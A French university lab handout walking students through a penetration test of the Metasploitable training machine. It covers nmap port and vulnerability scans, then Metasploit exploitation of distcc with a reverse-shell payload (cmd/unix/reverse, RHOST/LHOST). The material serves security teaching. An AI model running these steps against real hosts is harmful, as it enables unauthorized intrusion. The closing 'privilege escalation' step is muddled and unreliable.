Vous êtes sur la page 1sur 3

Université Cadi Ayyad Année universitaire : 2018-2019

Ecole Nationale des Sciences Appliquées GRT2

Filière Génie Réseaux & Télécoms Dr.Anas Abou el kalam

Marrakech Mouhsine Elallouchi

TP
1) L’étape de reconnaissance :

1-1 Dans cette étape le pentester essaie de trouver les adresses ip ,les noms de domaines , dns ,

Dans notre tp on va trouver juste l@ ip du machine Vulnérable (Metasploitable) on utilisant la

Commande : > ifconfig

1-2 Maintenant on a l’@ ip on va tester la connectivité entre kali linux et la machine de test

En utilisant la commande : > ping @ip

2) L’étape de Scanning : Recherche des ports ouverts et des


Vulnérabilités

Dans cet étape on s’intéresse au ports ouverts et au services utilisés puis on passe a l’analyse des

Vulnérabilités si vous avez nessus vous allez l’utiliser sinon si il n’y a pas de connexion internet

On va juste faire recours a nmap le fameux outil avec un script simple juste pour comprendre la

Méthodologie .

1-1 Lancez la commande > nmap –sS @ip qui va s’exécuter rapidement et qui permet
de scanner :

des milliers de ports par seconde sur un réseau rapide

1-2 Apres avoir analyser les ports ouverts et les services utilisés on va lancer la commande

 Nmap -script vuln qui permet de voir quelque risques qui peuvent nuire a la machine

1-3 On choisit la vulnérabilité qui va nous permettre de pénétrer le système


L’utilisation de nessus permet de nous indiquer très vite la vulnérabilité la plus dangereuse

C’est pas grave dans notre cas on va utiliser : distcc

3) L’étape de l’exploitation ou Gaining Access :

Dans cette étape on va utilise un outil très fort : metasploit

1-1) Lancez metasploit en tapant : > msfconsole . (ca peut prendre quelque minutes )

1-2)Recherchez la vuln distcc : > search distcc

1-3) La recherche va nous presenter quelque exploits a utiliser alors on choisit l’exploit :

En utilisant la commande : use /exploit/.. /..

N.B :

Vulnérabilité – Une faille dans un système qui peut être utilisée comme un moyen d’attaque.

Exploit – Un programme spécialement conçu pour exploiter une vulnérabilité.Il contient le


Payload .

Payload – le code à exécuter sur le système une fois que la vulnérabilité a été exploitée.

1-4) Connaitre les payloads que je peux utiliser avec l’exploit que j’ai choisit .tapez :

> Show payloads

1-5)On va utiliser le payload /cmd/unix/reverse en uitilisant la cmd :

> Set payload /cmd/unix/reverse

> Set RHOST @Machine vulnerable

> Set LHOST @ KALI

1-6) Maintenant on va exploiter :

> Exploit

Maintenant on est dans la machine vulnérable pour savoir notre position on lance la
commande : > whoami
4) L’étape de l’éscalation de privilèges :

1-cliquez sur Ctrl+C pour terminer la session .

2-tapez : > exploit –j

3-tapez : > whoami

Très bien maintenant tu peut faire ce que tu veux .